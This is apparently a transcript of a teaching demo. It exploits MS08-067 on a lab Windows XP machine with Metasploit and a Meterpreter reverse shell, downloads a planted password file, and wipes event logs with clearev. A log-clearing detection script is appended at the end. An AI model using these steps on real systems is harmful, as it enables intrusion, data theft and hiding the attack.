Hello all. Yesterday we saw two tools, Nmap and Nessus, which detect the vulnerabilities present in a system. To be sure of a vulnerability, we will try to exploit it using Metasploit, so today's demo is all about Metasploit.
Let's begin. I have two operating systems: one is the Ubuntu system which we are using, and the other is Windows XP. This is our target system, on which the vulnerability is actually present. The operating system is Microsoft Windows XP Service Pack 1. Let's find out the IP address of this system so that we can attack it. To get the IP address of Windows XP we use ipconfig in the command prompt, and we get the IP address of the system, which is 10.129.156.216. Similarly, we can get the IP address of the machine from which we are attacking. For that we use ifconfig, and the IP address of our system is 10.129.26.60. To be sure that the target system is indeed live, we just try to ping it. When we ping it we are indeed getting replies, which means the system is available.
Now, to start Metasploit we have to give the command msfconsole, and we need to do that in superuser mode, so we give sudo msfconsole. After giving the password this takes some time, which we are skipping. Once it starts, it shows that its current database has 1290 exploits, which means there are in total around 1300 exploits that we can target. To get the list of all the available commands we can use help. Here is the command show exploits, which loads all the exploits in the database so that we can search them later. This loads all the exploits and lists them.
We can see the exploits here. Some of them are buffer overflows, and I am highlighting a few: this one is a soft remote buffer overflow attack, which is present on Windows systems, and here is another exploit. Yesterday we saw that on scanning this system with Nessus we found an exploit with the name MS08-067, so let us search for that exploit and see whether it is present in Metasploit or not. It is indeed there, and this is the complete path of that exploit. In this demo we will attack our Windows system using this exploit only.
We copy the exploit path and use the command use, which loads that exploit so that we can work with it further. The prompt has changed to include the exploit name: initially it was msf, and now it is msf with the exploit name. We can type the command info, which gives all the information about this exploit. Here is the name of the exploit. It is about stack corruption, and its platform is Windows, which means this exploit is only available on Windows. The rank of great means that there is a high probability that we can actually attack the system. It also shows the available targets: this is a list of all the operating systems, along with their service packs, in which this vulnerability is present. Our system, which is Windows XP SP1, is indeed in this list, so we can attack it.
There are some options which we need to fill in, which I will come to shortly, and this is a small description of the vulnerability. It says that there is a bug in the code of netapi32.dll, which is what we exploit. We give the command show options, which tells us which options we need to fill in. Here we need to give three options: RHOST, RPORT and SMBPIPE. RPORT and SMBPIPE have already been given default values, so we keep those and just give the value of RHOST, which is the target address. We saw earlier that the target IP address is 10.129.156.216, so we set RHOST to that IP address.
Now, to exploit any system we need to send some piece of code to that system, and that piece of code is called the payload. In Metasploit one very good such code is Meterpreter, so we instruct Metasploit to use the payload windows/meterpreter/reverse_tcp. This will go into the target system using that vulnerable backdoor and will try to create a connection between the two systems. We also need to give some options to the Meterpreter code, which we can again see using show options. Here we see that LHOST is currently empty. LHOST is the listen address, so we need to give the IP address of the system from which we are attacking. We already figured that out using ifconfig: it is 10.129.26.60, so we set LHOST to that.
Now we are ready to attack. Just to be sure that all the options are filled in, we use show options, and indeed all the options are filled in. We run the attack using exploit, and it says that Meterpreter session 1 is open. That means the exploit is indeed successful and we have successfully entered the target system. There are a whole lot of commands in Meterpreter as well, and this is a list of all the commands in Meterpreter.
Again, you can get this list using help or a question mark. I will highlight some of the commands: there is help, then info, then migrate, which lets you migrate your Meterpreter code to some stable process. There is getpid, which gets the identifier of the process to which Meterpreter is currently attached. Then there is the execute command. The shell command opens a Windows shell for us. There is also the command ps, which lists all the processes running on the Windows system.
We use ps, and these are all the processes running on the targeted system. We can see that Windows processes are listed here, so we are indeed in that system. We use getpid to get the process identifier, which is 988, and we can see that 988 is attached to svchost. But there is one thing: this svchost is not a very stable process and it randomly changes into some other process, so it is possible that the Meterpreter code gets thrown out of it. To quickly move Meterpreter to some stable process we use migrate, and we can migrate it to the process explorer.exe, which is quite stable and always runs on a Windows system. We migrate, and the migration from PID 988 to PID 1420 is successful, so now the Meterpreter code is running in 1420, that is, inside explorer.exe.
Now we use the command shell, which opens a Windows shell. Here is the Windows shell, which you must be familiar with. Once we are in the system we can use all the commands that we can use in the Windows command prompt, like dir, which lists all the directories. For this demo I have created one secret information file on my Windows XP system. It is present in C: with the name secretinfo.txt, and let us say it contains a password, password@123, of some application. Let us try to get this file from this Ubuntu Metasploit machine. We go to the C: prompt, and there is the file secretinfo.txt. Once we are sure that we have secretinfo.txt, we exit from Meterpreter and use the command download, which downloads the file from that operating system to our machine. This is secretinfo.txt, and we are downloading it into our home folder. The download is successful, and now we can check whether the file is on our system or not. We go to the home folder and there is the file secretinfo.txt. When we open it, it has the same contents as the one we just showed on Windows XP: it contains the password. In this way you can exploit any system which has this vulnerability and obtain any secret information on that system.
Now there is one more important thing. Anything we try to do on a Windows system will be logged in event management, so Windows event management will log all the relevant information, but that does not happen in almost all operating systems. This is the Event Viewer. In the Event Viewer there are three things: Application, Security and System. Currently the Security tab has some logs showing that some other process has tried to enter the system. Because we have not done anything else on the XP machine, this must be some vulnerable thing. Meterpreter has a great command which deletes all the events from the Windows operating system so that no one can know that it has been exploited. That command is clearev, and it wipes all the records from the Windows system. It is saying that it has wiped six records from Security. When we refresh the Event Viewer we can see that all the events have been wiped. That means there is no information that this system has been attacked, but it actually has been. This ends our tutorial on Meterpreter. Thank you.
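The log wipe shown at the end of the demo can still be detected when events are forwarded off the host before they are cleared. The Python example below is added here and is not part of the original talk: it flags the log-clear events Windows itself writes (Security 517 on Windows 2000/XP/2003, Security 1102 and System 104 on Vista and later) and lists the records that now survive only in the forwarded copy. The record layout, field names and timestamps are constructed for illustration.

```python
# Added example, not from the talk: compare a host's local event log with the
# copy already forwarded to a central collector to expose a wiped log.

# Event IDs Windows writes when a log is cleared.
CLEAR_IDS = {
    ("Security", 517): "audit log cleared (Windows 2000/XP/2003)",
    ("Security", 1102): "audit log cleared (Vista and later)",
    ("System", 104): "event log cleared (Vista and later)",
}

def key(ev):
    """Identity of one record, used to match the two copies."""
    return (ev["channel"], ev["time"], ev["event_id"], ev["detail"])

def find_log_clearing(local, forwarded):
    """Return (clears, lost).
    clears: log-clear events found in either copy, oldest first.
    lost:   channel -> records the collector holds but the host no longer has.
    """
    merged = {key(ev): ev for ev in forwarded + local}
    clears = sorted(
        (ev for ev in merged.values()
         if (ev["channel"], ev["event_id"]) in CLEAR_IDS),
        key=lambda ev: ev["time"],
    )
    on_host = {key(ev) for ev in local}
    lost = {}
    for ev in forwarded:
        if key(ev) not in on_host:
            lost.setdefault(ev["channel"], []).append(ev)
    return clears, lost

def _ev(time, event_id, detail, channel="Security"):
    return {"channel": channel, "time": time, "event_id": event_id, "detail": detail}

# Constructed sample data: six Security records forwarded before the wipe,
# then the clear event, which is all that remains on the host afterwards.
BEFORE = [_ev(f"2000-01-01T10:0{i}:00", eid, text) for i, (eid, text) in enumerate([
    (540, "network logon"), (576, "special privileges assigned"),
    (528, "interactive logon"), (538, "logoff"),
    (540, "network logon"), (576, "special privileges assigned")])]
CLEAR = _ev("2000-01-01T10:09:00", 517, "audit log cleared")
LOCAL, FORWARDED = [CLEAR], BEFORE + [CLEAR]

if __name__ == "__main__":
    clears, lost = find_log_clearing(LOCAL, FORWARDED)
    for ev in clears:
        print(ev["time"], ev["channel"], ev["event_id"], CLEAR_IDS[(ev["channel"], ev["event_id"])])
    for channel, records in lost.items():
        print(f"{channel}: {len(records)} forwarded records missing on host")
```
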